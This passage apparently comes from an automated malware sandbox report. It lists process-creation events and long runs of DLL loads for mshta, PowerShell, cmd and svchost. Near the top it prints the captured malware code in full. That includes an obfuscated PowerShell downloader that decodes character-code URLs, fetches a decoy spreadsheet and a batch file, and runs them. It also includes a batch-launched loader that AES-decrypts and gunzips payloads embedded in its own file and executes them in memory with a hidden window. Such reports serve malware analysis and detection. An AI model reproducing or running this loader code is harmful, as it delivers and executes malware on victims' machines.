@(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
